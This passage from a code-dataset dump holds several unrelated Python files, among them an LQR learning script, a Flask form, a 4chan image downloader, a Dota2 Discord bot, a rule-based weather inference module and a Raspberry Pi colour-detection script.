tf.summary.scalar('loss', loss, step=i)\n tf.summary.scalar('loss sysID', loss_sysID, step=i)\n tf.summary.scalar('Mass/learned', massinv_tf[0], step=i)\n tf.summary.scalar('Mass/Ground_truth', (1/mass), step=i)\n\n tf.summary.scalar('Q_1/learned', Qtrain_tf[0], step=i)\n tf.summary.scalar('Q_2/learned', Qtrain_tf[1], step=i)\n tf.summary.scalar('Q_1/Ground_truth', Q[0,0], step=i)\n tf.summary.scalar('Q_2/Ground_truth', Q[1,1], step=i)\n\n tf.summary.scalar('xf_1/learned', xf_tf[0,0], step=i)\n # tf.summary.scalar('xf_2/learned', xf_tf[1,0], step=i)\n tf.summary.scalar('xf_1/Ground_truth', xf[0,0], step=i)\n # tf.summary.scalar('xf_2/Ground_truth', xf[1,0], step=i)\n\n tf.summary.scalar('R/learned', Rtrain_tf[0], step=i)\n tf.summary.scalar('R/Ground_truth', R[0,0], step=i)\n if i%20 == 1:\n ckpt_manager.save()\n test_indx = 10\n vel_fG = tf.zeros((int(n/2),1), dtype=tf.dtypes.float64)\n B_tf = massinv_tf*Bpart_tf\n K_lqr = LQR_tf(A_tf, B_tf, Qtrain_tf, Rtrain_tf, T, n)\n u_sys = []\n u_lqr = []\n x_lqr = []\n x_lqr.append(train_xinit_tf[test_indx])\n xf_full = tf.concat([xf_tf, vel_fG], axis=0)\n for t in range(T):\n u_sys.append( K_lqr[T-1-t]@(tf.expand_dims(expert_trajs[test_indx, :n, t], axis = 1) - xf_full) )\n u_lqr.append( K_lqr[T-1-t]@(x_lqr[t] - xf_full) )\n x_lqr.append( A_tf@x_lqr[t] + B_tf@u_lqr[t] )\n\n u_lqr = tf.concat([tf.concat(u_lqr, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n u_sys = tf.concat([tf.concat(u_sys, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n x_lqr = tf.concat(x_lqr, axis = 1)\n fig, axes = plt.subplots(2, 2, figsize=(15, 15))\n axes[0, 0].plot(expert_trajs[test_indx,2,:], label = 'u des')\n axes[0, 0].plot(u_sys[0,:], label = 'u pred sysID')\n axes[0, 0].set_xlabel('t')\n axes[0, 0].set_ylabel('u')\n axes[0, 0].legend()\n\n axes[0, 1].plot(expert_trajs[test_indx,0,:], label = 'data')\n axes[0, 1].plot(x_lqr[0,:], label = 'learned')\n axes[0, 1].set_title(\"Position\")\n axes[0, 1].set_xlabel('t')\n axes[0, 1].set_ylabel('x')\n axes[0, 1].legend()\n\n axes[1, 0].plot(expert_trajs[test_indx,1,:], label = 'data')\n axes[1, 0].plot(x_lqr[1,:], label = 'learned')\n axes[1, 0].set_title(\"Velocity\")\n axes[1, 0].set_xlabel('t')\n axes[1, 0].set_ylabel('xdot')\n\n axes[1, 1].plot(expert_trajs[test_indx,2,:], label = 'data')\n axes[1, 1].plot(u_lqr[0,:], label = 'learned')\n axes[1, 1].set_title(\"Control\")\n axes[1, 1].set_xlabel('t')\n axes[1, 1].set_ylabel('u')\n axes[1, 1].legend()\n\n plt.savefig(plot_dir + 
'/test%d.png'%i)\n plt.clf()\n plt.close()\n train_loss /= train_num\n train_loss_list.append(train_loss)\n print(\"epoch: {}, train loss: {:.3f}\".format(e+1, train_loss))\n\n # #------------PLOTTING---------------\n # q_lqr = [x_lqr[i][0,0] for i in range(T+1)]\n # qdot_lqr = [x_lqr[i][1,0] for i in range(T+1)]\n # u_lqr = [u_lqr[i][0,0] for i in range(T)]\n # plot_indx = 0\n # fig, axes = plt.subplots(2, 2, figsize=(10, 10))\n # axes[0, 0].plot(expert_trajs[plot_indx,0,:], expert_trajs[plot_indx,1,:], label = 'data')\n # axes[0, 0].plot(x[0,:], x[1,:], label = 'cvx')\n # axes[0, 0].plot(q_lqr, qdot_lqr, label = 'lqr')\n # axes[0, 0].set_title(\"Phase plot\")\n # axes[0, 0].set_xlabel('x')\n # axes[0, 0].set_ylabel('xdot')\n # axes[0, 0].legend()\n\n # axes[0, 1].plot(expert_trajs[plot_indx,0,:], label = 'data')\n # axes[0, 1].plot(x[0,:], label = 'cvx')\n # axes[0, 1].plot(q_lqr, label = 'lqr')\n # axes[0, 1].set_title(\"Position\")\n # axes[0, 1].set_xlabel('t')\n # axes[0, 1].set_ylabel('x')\n # # axes[0, 1].legend()\n\n # axes[1, 0].plot(expert_trajs[plot_indx,1,:], label = 'data')\n # axes[1, 0].plot(x[1,:], label = 'cvx')\n # axes[1, 0].plot(qdot_lqr, label = 'lqr')\n # axes[1, 0].set_title(\"Velocity\")\n # axes[1, 0].set_xlabel('t')\n # axes[1, 0].set_ylabel('xdot')\n\n # axes[1, 1].plot(expert_trajs[plot_indx,2,:], label = 'data')\n # axes[1, 1].plot(u[0,:], label = 'cvx')\n # axes[1, 1].plot(u_lqr, label = 'cvx')\n # axes[1, 1].set_title(\"Control\")\n # axes[1, 1].set_xlabel('t')\n # axes[1, 1].set_ylabel('u')\n # axes[1, 1].legend()\n # plt.show()\n # plt.savefig('lqr_self.png')\n\nif __name__ == '__main__':\n main()","sub_path":"notebooks/learnLQR_self.py","file_name":"learnLQR_self.py","file_ext":"py","file_size_in_byte":12671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"59656699","text":"#!/usr/bin/env python3.6\n# this is a file that prints a requested line of a requested filer\n\nimport os, argparse, sys\n\nparser = argparse.ArgumentParser(description='Read a line of a file')\nparser.add_argument('--filename', '-f', help='the file to read')\nparser.add_argument('--linenumber', '-l', type=int, help='the line number to read')\nparser.add_argument('--version', '-v', action='version', version='%(prog)s 2.0')\nargs = parser.parse_args()\n#file_name = input(\"What file would you like to read a line from? \").strip()\nfile_name = args.filename\n\n# see if file is in current directory\nfh = os.path.isfile(f'{file_name}')\ntry:\n f = open(f'{file_name}', 'r')\nexcept FileNotFoundError as f:\n print(f'\\tError: {f}')\n sys.exit(2)\nelse:\n fh = os.path.isfile(f'{file_name}')\n print(f'Working with file \"{file_name}\"')\n # check file length\n flen = len(open(f'{file_name}').readlines())\n file_length = flen - 1\n # get user input on what line they would like to read\n print(f'The file \"{file_name}\" has {file_length} lines')\n #line_number = int(input(f\"What line would you like to read from {file_name}? 
\"))\n line_number = args.linenumber\n # check if the line they want to read exists in file\n if line_number <= file_length:\n #print('You chose a valid number')\n arr = f.readlines()\n line = arr[line_number]\n print(f'Line {line_number} of \"{file_name}\" file says: {line}')\n else:\n print('The number you have me is too high')\n","sub_path":"python/handling_errors_when_files_dont_exist.py","file_name":"handling_errors_when_files_dont_exist.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"382071888","text":"import datetime\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectField\nfrom wtforms.fields.html5 import IntegerField, URLField, DateTimeField\nfrom wtforms.validators import DataRequired, Length, ValidationError, NumberRange, url\n\nfrom pat import Gender\nfrom pat.trainer.forms import specialization_query\n\n\ndef gender_query():\n return Gender.query\n\n\nclass CreateTrainingForm(FlaskForm):\n description = StringField('Description', validators=[DataRequired(), Length(min=5, max=1000)])\n place = URLField(validators=[url()])\n training_start = DateTimeField('Training start', validators=[DataRequired()])\n training_end = DateTimeField('Training end', validators=[DataRequired()])\n specialization = QuerySelectField('Specialization', query_factory=specialization_query,\n allow_blank=False, get_label='specialization')\n gender = QuerySelectField('Gender', query_factory=gender_query, allow_blank=False, get_label='gender')\n number = IntegerField('Nubmer of people', validators=[NumberRange(min=0, max=30)])\n submit = SubmitField('Create training')\n\n def validate_training_end(self, training_end):\n if self.training_end.data <= self.training_start.data:\n raise ValidationError('Training and must be > training start')\n else:\n return True\n\n def validate_training_start(self, training_start):\n a = datetime.datetime.strptime(str(self.training_start.data), \"%Y-%m-%d %H:%M:%S\")\n if a < datetime.datetime.now():\n raise ValidationError('You can bot create past event')\n else:\n return True\n","sub_path":"pat/training/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"1512760","text":"#!/usr/bin/python\n\nimport requests\nfrom lxml import html\nfrom io import open as iopen\nfrom urllib.parse import urlsplit\n\n\ndef requests_image(file_url):\n\tfile_name = urlsplit(file_url)[2].split('/')[-1]\n\timage = requests.get(file_url)\n\tif image.status_code == requests.codes.ok:\n\t\twith iopen(file_name, 'wb') as file:\n\t\t\tfile.write(image.content)\n\t\t\tprint(\"> Image {} downloaded ({}/{})\".format(file_name, index, len(images_links)))\n\n\nprint(\"\"\" \\n\n ██╗ ██╗ ██████╗██╗ ██╗ █████╗ ███╗ ██╗\n ██║ ██║██╔════╝██║ ██║██╔══██╗████╗ ██║\n ███████║██║ ███████║███████║██╔██╗ ██║\n ╚════██║██║ ██╔══██║██╔══██║██║╚██╗██║\n ██║╚██████╗██║ ██║██║ ██║██║ ╚████║\n ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝\n\"\"\")\n\n\nthread_url = input(\"Insert Thread URL: \")\n\nthread = requests.get(thread_url)\nhtml = html.fromstring(thread.content)\nimages_links = html.xpath(\"//div[@class='board']//a[@class='fileThumb']/@href\")\n\nprint(\"\\n{} images found\".format(len(images_links)))\nprint(\"Download starting, please wait...\")\n\nindex = 0\nfor link in images_links:\n\tindex += 
1\n\trequests_image(\"http:\" + str(link))\n\nprint(\"\\nSuccessfully downloaded {} images! (Probably)\".format(len(images_links)))\n","sub_path":"old/4chan-dl-old.py","file_name":"4chan-dl-old.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"309591208","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n __main__.py\n -----------\n\n TxTraderClient module - Expose class API as CLI\n\n Copyright (c) 2017 Reliance Systems Inc. \n Licensed under the MIT license. See LICENSE for details.\n\n\"\"\"\n\nif __name__=='__main__':\n from txtrader_client.client import API\n import simplejson as json\n from sys import argv\n flags=[]\n while argv[1].startswith('-'):\n flags.append(argv[1])\n del(argv[1])\n server, command = argv[1:3]\n args = argv[3:]\n ret = API(server).cmd(command, args)\n if ret != None:\n if '-p' in flags:\n print(json.dumps(ret, sort_keys=True, indent=2, separators=(',', ': ')))\n else:\n print(json.dumps(ret))\n","sub_path":"txtrader_client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158236005","text":"def buildLowestNumber(min):\n str1 = str(min)\n for i in range(0, len(str1)):\n strObj = str1[0: i:] + str1[i + 1::]\n temp = int(strObj)\n if min>temp:\n min = temp\n print(min)\n\nT = int(input())\n\nfor i in range(0, T):\n x = int(input()) \n buildLowestNumber(x)","sub_path":"Unkown/DiscountInAShop.py","file_name":"DiscountInAShop.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"359443700","text":"import discord\nimport sys\nfrom bota.constant import MAX_COMMAND_WORD_LENGTH\nfrom bota.private_constant import DISCORD_TOKEN, DISCORD_CLIENT_ID, ADMIN_ID\nfrom bota.applications.top_games import get_top_games\nfrom bota.web_scrap.scrap import get_current_trend, get_counter_hero, get_good_against, get_reddit\nfrom bota.web_scrap.scrap import get_skill_build, get_item_build, get_profile, save_id\nfrom bota.web_scrap.twitch_process import get_dota2_top_stream\nfrom bota.log_process import save_command_logs, get_command_log_tail\nfrom discord.utils import find\nfrom bota import constant\n\nclient = discord.Client()\n\n# This weird spacing is to pretty text in discord\ncommands_list = {'!top_game' : 'Shows top 9 Live Games eg: `!top game`',\n '!counter HeroName': 'Shows Heroes which counter the given hero name eg: `!counter am`',\n '!good HeroName' : 'Opposite of !counter command. Good against. eg: `!good axe`',\n '!skill or !talent HeroName': 'Shows most popular & win rate talent/skill build eg:`!skill meepo`',\n '!item HeroName' : 'Shows current meta item build by Top Rank Players eg: `!item kotl`',\n '!profile steamID': 'Shows your profile stats given steamID eg: `!profile 116585378`',\n '!save Alias steamID': 'Saves your steamID under Alias name, and call by Alias name.\\n'\n ' \\\n First **--->** `!save midone 116585378` Then **--->** `!profile midone`',\n '!trend' : 'Shows current heroes trend eg: `!trend`',\n '!twitch' : 'Shows Top 8 Twitch stream eg: `!twitch`',\n '!reddit' : 'Gets a reddit post from **/r/DotA2**. 
Options: `new`, `controversial`, `top`, `rising`, `random`, `hot`:\n'\n                  ' eg 1: `!reddit` : Gets a random post from /r/DotA2/\n'\n                  ' eg 2: `!reddit hot` : Gets Top 3 hot posts from /r/DotA2/\n'\n                  ' eg 3: `!reddit new` : Gets Top 3 new posts from /r/DotA2/\n'\n                 }\n\n\ndata_source_collection = \"**DATA COLLECTION SOURCE**:\\n\" \\\n                         \"1. DotaBuff\\n\" \\\n                         \"2. Reddit\\n\" \\\n                         \"3. Twitch\\n\" \\\n                         \"4. Dota2 ProTracker\\n\" \\\n                         \"5. Dota2API\"\n\n\ndef get_help():\n    help_string = []\n    head = \"```css\\nBelow are the commands to use DOTA BOT: 😋```\"\n    below_head = '```cs\\n\"UPDATE\": Add Notable players in \"!top game\"\\n\"NOTE\": Can use short Hero Names, \"!counter anti mage\" as \"!counter am\"```'\n    head = head + below_head\n    help_string.append(head)\n    for key, value in commands_list.items():\n        command = '**' + key + '**'\n        command_help = value\n        full = command + '\\t:\\t' + command_help\n        help_string.append(full + '\\n')\n    help_string = \"\\n\".join(help_string)\n    return help_string\n\n\n@client.event # event decorator/wrapper\nasync def on_ready():\n    await client.change_presence(activity=discord.Game(name=\"Dota2 | type '!help'\"))\n    print(f\"Logged in as {client.user}\")\n\n\n@client.event\nasync def on_guild_join(guild):\n    general = find(lambda x: x.name == 'general', guild.text_channels)\n    if general and general.permissions_for(guild.me).send_messages:\n        await general.send(f'Hello **{guild.name}**✌✌!\\n'\n                           f'Type `!help` or `!command` to get a list of commands to use.')\n\n@client.event\nasync def on_message(message):\n    is_command_called = True\n    command_called = \"\"\n    message_string = message.content\n    message_string = message_string.lower().strip()\n    message_word_length = len(message_string.split())\n    print(f\"{message.channel}: {message.author}: {message.author.name}: {message.content}\")\n\n    if client.user == message.author:\n        is_command_called = False\n        # Ignore all messages sent by our bot\n        pass\n\n    elif message.author.bot:\n        # Ignore if message is from another Bot\n        is_command_called = False\n        pass\n\n    elif '!help' == message_string or '--help' == message_string or '!command' in message_string:\n        command_called = \"!help\"\n        help_string = get_help()\n        await message.channel.send(help_string)\n\n    elif ('!top_game' in message_string or '!top game' in message_string) and \\\n            message_word_length < MAX_COMMAND_WORD_LENGTH:\n        command_called = \"!top_game\"\n        image_path = get_top_games()\n        await message.channel.send(f\"Getting Top Live Spectating Games, Source: Dota2API, Dota2ProTracker\")\n        await message.channel.send('Top Games: ', file=discord.File(f'{image_path}'))\n\n    elif '!profile' in message_string.split()[0]:\n        command_called = \"!profile\"\n        flag, id, mode, result = get_profile(message_string)\n        if not flag:\n            if mode == 1:\n                await message.channel.send(f'Could not find any profile under: **{id}**')\n            else:\n                await message.channel.send(f'Could not find any Alias name: **{id}**')\n        else:\n            await message.channel.send(f\"____**{id}**____'s Profile, Source: DotaBuff\")\n            await message.channel.send(result)\n\n    elif '!save' in message_string.split()[0]:\n        command_called = \"!save\"\n        user_name, id, flag, status = save_id(message_string)\n        if flag:\n            await message.channel.send(f'**{id}** saved under the alias: {user_name}')\n        else:\n            await message.channel.send(f'**Failed to save**, reason: {status}')\n\n    elif \"!trend\" in message_string and message_word_length < (MAX_COMMAND_WORD_LENGTH - 2):\n        command_called = \"!trend\"\n        image_path = get_current_trend()\n        
await message.channel.send(f\"Getting this week Heroes Trend, Source: DotaBuff\")\n await message.channel.send('Current Trend: ', file=discord.File(image_path))\n\n elif (\"!counter\" in message_string or \"!bad\" in message_string) and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!counter\"\n found, hero_name, image_path = get_counter_hero(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** is bad against, Source: DotaBuff ', file=discord.File(image_path))\n\n elif \"!good\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!good\"\n found, hero_name, image_path = get_good_against(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** is good against, Source: DotaBuff ', file=discord.File(image_path))\n\n elif (\"!skill\" in message_string or \"!talent\" in message_string) \\\n and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!skill\"\n found, hero_name, image_path = await get_skill_build(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** most popular Skill/Talent build: , Source: DotaBuff', file=discord.File(image_path))\n\n elif \"!item\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!item\"\n found, hero_name, image_path = get_item_build(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** recent Item build by **Top Rank Players**:, Source: DotaBuff', file=discord.File(image_path))\n\n elif \"!twitch\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!twitch\"\n result = get_dota2_top_stream()\n await message.channel.send(f'Source: Twitch{result}')\n\n elif \"!reddit\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n result_list, mode = get_reddit(message_string)\n command_called = f\"!reddit {mode}\"\n await message.channel.send(f\"**REDDIT** SortBy: **{mode.upper()}**, Source: Reddit\")\n for result in result_list:\n await message.channel.send(f'{result}')\n\n # elif \"!data\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n # await message.channel.send(data_source_collection)\n\n # Admin privilege\n elif \"!get_user\" in message_string and str(message.author) == ADMIN_ID:\n command_called = \"!get_user\"\n await message.channel.send(f'Steam Users ID:', file=discord.File(constant.STEAM_USER_FILE_PATH))\n\n elif \"!tail\" in message_string and str(message.author) == ADMIN_ID:\n is_command_called = False\n n = 5\n try:\n n = 
int(message_string.split()[1])\n except Exception:\n pass\n tail_log = get_command_log_tail(n)\n await message.channel.send(tail_log)\n\n # Message user\n elif f\"{DISCORD_CLIENT_ID}\" in message_string:\n await message.channel.send(f\"Hello {message.author.name}\"\n f\" Please type `!help` or `!command` for more options\")\n\n else:\n is_command_called = False\n\n if is_command_called:\n save_command_logs(message, command_called)\n\n\nclient.run(DISCORD_TOKEN)\n","sub_path":"bota/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"353203766","text":"import sys\nfrom .base import DynamicField\nfrom rest_framework import serializers\n\nfor cls_name in (\n 'BooleanField',\n 'CharField',\n 'DateField',\n 'DateTimeField',\n 'DecimalField',\n 'DictField',\n 'EmailField',\n 'FilePathField',\n 'FloatField',\n 'HiddenField',\n 'IPAddressField',\n 'ImageField',\n 'IntegerField',\n 'JSONField',\n 'ListField',\n 'RegexField',\n 'SlugField',\n 'TimeField',\n 'URLField',\n 'UUIDField',\n):\n cls = getattr(serializers, cls_name, None)\n if not cls:\n continue\n\n new_name = 'Dynamic%s' % cls_name\n new_cls = type(\n new_name,\n (DynamicField, cls),\n {}\n )\n setattr(sys.modules[__name__], new_name, new_cls)\n\n\nclass DynamicMethodField(\n serializers.SerializerMethodField,\n DynamicField\n):\n pass\n","sub_path":"dynamic_rest/fields/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65828988","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Yuvv'\n\nimport functools\nfrom predictor.models import Rule, Knowledge\n\n\ndef valid_rule_filter_fixed(rule, knowledge):\n rule.cf_e = 0\n if rule.relationship == '&':\n for rkf in rule.related_knowledge_factor.all():\n if rkf.mark.mark not in knowledge:\n return False\n else:\n for rkw in rule.related_knowledge_weight.all():\n if rkf.mark.mark == rkw.mark.mark:\n rule.cf_e += rkf.factor * rkw.weight\n break\n elif rule.relationship == '|':\n flag = True\n for rkf in rule.related_knowledge_factor.all():\n if rkf.mark.mark in knowledge:\n rule.cf_e = max(map(lambda x: x.factor, rule.related_knowledge_factor.all()))\n flag = False\n break\n if flag:\n return False\n elif rule.relationship == '-':\n cdt = rule.related_knowledge_factor.all()[0]\n if cdt.mark.mark in knowledge:\n rule.cf_e = cdt.factor\n else:\n return False\n else:\n pass\n\n if rule.cf_e < rule.certainty_range:\n return False\n return True\n\n\ndef conflict_rule_filter(rules, knowledge):\n r_single = []\n r_or = []\n r_and = []\n for rule in rules:\n if rule.relationship == '&':\n r_and.append(rule)\n elif rule.relationship == '|':\n r_or.append(rule)\n elif rule.relationship == '-':\n r_single.append(rule)\n else:\n pass\n\n # single vs or\n i = 0\n while i < len(r_single):\n rs_mark = r_single[i].related_knowledge_factor.all()[0].mark.mark\n j = 0\n while j < len(r_or):\n ro_marks_on = filter(\n lambda mo: True if mo in knowledge else False,\n map(lambda rkf: rkf.mark.mark, r_or[j].related_knowledge_factor.all())\n )\n if rs_mark in ro_marks_on:\n if r_single[i].cf_e < r_or[j].cf_e:\n r_single.remove(r_single[i])\n i -= 1\n break\n else:\n r_or.remove(r_or[j])\n j -= 1\n j += 1\n i += 1\n # single vs and\n i = 0\n while i < len(r_single):\n rs_mark = r_single[i].related_knowledge_factor.all()[0].mark.mark\n j = 0\n while j < len(r_and):\n for ra_rkf 
in r_and[j].related_knowledge_factor.all():\n                if ra_rkf.mark.mark == rs_mark:\n                    if r_single[i].cf_e < r_and[j].cf_e:\n                        r_single.remove(r_single[i])\n                        i -= 1\n                        break\n                    else:\n                        r_and.remove(r_and[j])\n                        j -= 1\n                        break\n            j += 1\n        i += 1\n    # or vs and\n    i = 0\n    while i < len(r_or):\n        # materialize as a set: filter() is a one-shot iterator in Python 3, and these\n        # marks are tested with 'in' repeatedly in the inner loop below\n        ro_marks_on = set(filter(\n            lambda mo: mo in knowledge,\n            map(lambda rkf: rkf.mark.mark, r_or[i].related_knowledge_factor.all())\n        ))\n        j = 0\n        while j < len(r_and):\n            for ra_mark in map(lambda y: y.mark.mark, r_and[j].related_knowledge_factor.all()):\n                if ra_mark in ro_marks_on:\n                    if r_and[j].cf_e < r_or[i].cf_e:\n                        r_and.remove(r_and[j])\n                        j -= 1\n                    else:\n                        r_or.remove(r_or[i])\n                        i -= 1\n                    break\n            j += 1\n        i += 1\n\n    r_and.extend(r_or)\n    r_and.extend(r_single)\n    return r_and\n\n\ndef rule_reduce(a, b):\n    if a >= 0 and b >= 0:\n        return a + b - a * b\n    elif a <= 0 and b <= 0:\n        return a + b + a * b\n    else:\n        return (a + b) / (1 - min(abs(a), abs(b)))\n\n\ndef collect_knowledge(temp, humi, visi, speed):\n    knowledge = set()\n    for k in Knowledge.objects.all():\n        if k.category.name == 'temperature':\n            if k.max_value >= temp >= k.min_value:\n                knowledge.add(k.mark)\n        elif k.category.name == 'humidity':\n            if k.max_value >= humi >= k.min_value:\n                knowledge.add(k.mark)\n        elif k.category.name == 'visibility':\n            if k.max_value >= visi >= k.min_value:\n                knowledge.add(k.mark)\n        elif k.category.name == 'wind speed':\n            if k.max_value >= speed >= k.min_value:\n                knowledge.add(k.mark)\n        else:\n            pass\n\n    return knowledge\n\n\ndef infer_v2(target, temp=0, humi=0, visi=0, speed=0):\n    target_mark = Knowledge.objects.get(detail=target)\n    rules = Rule.objects.filter(expression__endswith=target_mark)\n    knowledge = collect_knowledge(temp, humi, visi, speed)\n\n    try:\n        rules = filter(lambda x: valid_rule_filter_fixed(x, knowledge), rules)\n        # rules = conflict_rule_filter(rules, knowledge)\n        cf_hs = map(lambda rule: rule.certainty_factor * max(0, rule.cf_e), rules)\n        result = functools.reduce(rule_reduce, cf_hs)\n    except TypeError:\n        result = 'cannot calculate!'\n\n    return result\n","sub_path":"py-django/WeatherGetter/webview/predictor/utils/inferencev2.py","file_name":"inferencev2.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"425138953","text":"import cv2\nimport numpy as np\nimport pandas as pd\nimport time\nimport RPi.GPIO as GPIO\nfrom pygame import mixer\n\n\nbtn_pin = 15\nmode = 1 # 1 for color and 0 for ph\nst_time = -1\nframeWidth = 640\nframeHeight = 480\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\nprev_result = \"nill\"\ncount = 0\n\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(btn_pin, GPIO.IN)\nmixer.init()\n\ndef getColorName(R,G,B):\n    index=[\"color_name\",\"R\",\"G\",\"B\"]\n    csv = pd.read_csv('colorsV4.csv', names=index, header=None,encoding='latin-1')\n    minimum = 10000\n    for i in range(len(csv)):\n        d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"]))\n        if(d<=minimum):\n            minimum = d\n            cname = csv.loc[i,\"color_name\"]\n    return cname\n\ndef func_mode2():\n\n    hsv_frame = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n    # Red color\n    low_red = np.array([0, 60, 105])\n    high_red = np.array([13, 255, 205])\n    red_mask = cv2.inRange(hsv_frame, low_red, high_red)\n    #red = cv2.bitwise_and(img, img, mask=red_mask)\n    Red = cv2.countNonZero(red_mask)\n\n    # Blue color\n    low_blue = np.array([94, 80, 2])\n    high_blue = np.array([126, 255, 255])\n    blue_mask = 
cv2.inRange(hsv_frame, low_blue, high_blue)\n #blue = cv2.bitwise_and(img, img, mask=blue_mask)\n Blue = cv2.countNonZero(blue_mask)\n\n # Green color\n low_green = np.array([16, 40, 86])\n high_green = np.array([35, 180, 205])\n green_mask = cv2.inRange(hsv_frame, low_green, high_green)\n #green = cv2.bitwise_and(img, img, mask=green_mask)\n Ph = cv2.countNonZero(green_mask)\n\n print(Red,\" \",Blue,\" \",Ph,\" \",\" step output \")\n if(Red > Blue and Red > 50):\n print(\"red\")\n mixer.music.load('ColorFiles(hi)/' + \"RED\" +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n elif(Blue > Red and Blue> 50 ):\n print(\"blue\")\n mixer.music.load('ColorFiles(hi)/' + \"BLUE\" +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n elif(Ph > 50 ):\n print(\"ph paper\")\n mixer.music.load('ColorFiles(hi)/' + \"ph paper detected\" +'.mp3')\n mixer.music.play()\n time.sleep(1)\n else: \n print(\"..*******************\")\n mixer.music.load('ColorFiles(hi)/' + \"no ph paper detected\" +'.mp3')\n mixer.music.play()\n time.sleep(1)\n #cv2.rectangle(img, (60,50), (580,430), (0,255,0), 3)\n\n\ndef func_mode1():\n\n cv2.rectangle(img, (309,229), (329,249), (0,255,0), 1) #pixel range = x ==> 0-639 and y == 0 - 479\n roi = img[230:249, 310:329]\n avg1 = np.average(roi, axis=0)\n avg2 = np.average(avg1, axis=0)\n avg2_int = avg2.astype(int)\n avg2_int = avg2_int[::-1] #reversed for rgb \n # avg2_int_tup = tuple(avg2_int)\n r = avg2_int[0]\n g = avg2_int[1]\n b = avg2_int[2]\n\n new = getColorName(r,g,b)\n print(new)\n mixer.music.load('ColorFiles(hi)/' + new +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n\n\nwhile True:\n success, img = cap.read()\n time.sleep(0.1)\n if (GPIO.input(btn_pin) == False):\n time.sleep(0.01)\n if (GPIO.input(btn_pin) == False):\n time.sleep(0.2)\n if (GPIO.input(btn_pin) == True):\n count+=1\n if(st_time==-1):\n st_time = time.time()\n\n if(st_time!=-1):\n if(time.time()-st_time>1 and time.time()-st_time<1.5):\n print(count)\n if(count==1):\n print(mode)\n if(mode):\n func_mode1()\n else:\n func_mode2()\n\n else:\n mixer.music.load('ColorFiles(hi)/' + \"mode changed\" +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n mode = not mode\n if(mode):\n print(\"changed mode 1\")\n\n mixer.music.load('ColorFiles(hi)/' + \"color detection mode\" +'.mp3')\n mixer.music.play()\n time.sleep(0.8)\n #sound\n else:\n print(\"changed mode 2\")\n mixer.music.load('ColorFiles(hi)/' + \"ph paper color detection mode\" +'.mp3')\n mixer.music.play()\n time.sleep(1)\n #sound\n\n count=0\n st_time=-1;\n\n if(time.time()-st_time>1.5):\n count=0\n st_time=-1\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n\n img = cv2.flip(img,1)\n \n cv2.imshow('CAMERA',img)\n \ncap.release()\n\ncv2.destroyAllWindows()\n\n","sub_path":"COLOR PICKER/Python test codes/v3_contour/nocontour.py","file_name":"nocontour.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"542642008","text":"import random\nimport 